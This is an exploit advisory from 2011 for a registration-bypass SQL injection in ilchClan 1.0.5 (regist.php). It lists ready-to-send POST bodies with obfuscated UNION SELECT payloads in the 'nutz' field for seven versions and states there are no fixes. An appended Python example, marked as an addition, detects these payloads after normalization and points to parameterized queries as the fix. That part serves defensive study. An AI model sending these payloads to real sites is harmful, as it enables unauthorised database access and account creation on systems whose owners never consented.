ilchClan 1.0.5 (regist.php) SQL Injection Vulnerability

2011-04-02 16:15:13

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f!
Vulnerability Name : Registration Bypass SQL Injection Vulnerability
Date : 02.04.2011
SQL Injection method : $_POST
Discovered by : Easy Laster
Security Group : Team-Internet, Undergroundagents, websec-empire.to and 4004-Security-Project.com
Greetings to free-hack.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Security Flaws
=-=-=-=-=-=-=-=-=-=-=-=
ilch clan 1.0.5
checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa
ilch clan 1.0.5a
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa
ilch clan 1.0.5b
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa
ilch clan 1.0.5c
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa
ilch clan 1.0.5d
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa
ilch clan 1.0.5e
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
ilch clan 1.0.5f
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
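
Detection example added here (not part of the original advisory and not ilch code): the request bodies above replace spaces with /**/ comments and mix letter case, so a plain keyword filter on the nutz field misses them, while matching after normalization does not. The function names and the benign sample body are assumptions made for this example; the first sample body is the 1.0.5a entry listed above.

```python
import re
from urllib.parse import parse_qsl

# Body for 1.0.5a as listed in the advisory; the benign body is constructed.
ADVISORY_BODY = ("checked=Gelesen+und+einverstanden"
                 "&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa")
BENIGN_BODY = "checked=Gelesen+und+einverstanden&nutz=Student+Union&email=aaa"

_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # /**/ stands in for whitespace
_UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
_LINE_COMMENT = re.compile(r"--(?:\s|$)")          # trailing "-- " cuts off the query

def field_values(body, field):
    """URL-decode a form body and return every value submitted for `field`."""
    return [v for k, v in parse_qsl(body, keep_blank_values=True) if k == field]

def normalize(value):
    """Replace SQL block comments with a space, collapse whitespace, fold case."""
    value = _BLOCK_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()

def naive_match(body, field="nutz"):
    """Keyword filter on the decoded value only: the check the obfuscation defeats."""
    return any("union select" in v.lower() for v in field_values(body, field))

def inspect_form(body, field="nutz"):
    """Return the list of findings for `field` after normalization."""
    findings = []
    for raw in field_values(body, field):
        value = normalize(raw)
        if _UNION_SELECT.search(value):
            findings.append("union-select")
        if "'" in value and _LINE_COMMENT.search(value):
            findings.append("quote-then-comment")
    return findings

if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(label, "naive:", naive_match(body), "normalized:", inspect_form(body))
```

A check like this belongs in request logging or a WAF rule as a supplement; the root-cause fix is for regist.php to pass nutz to the database as a bound parameter instead of concatenating it into the query.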

Fixes

No fixes
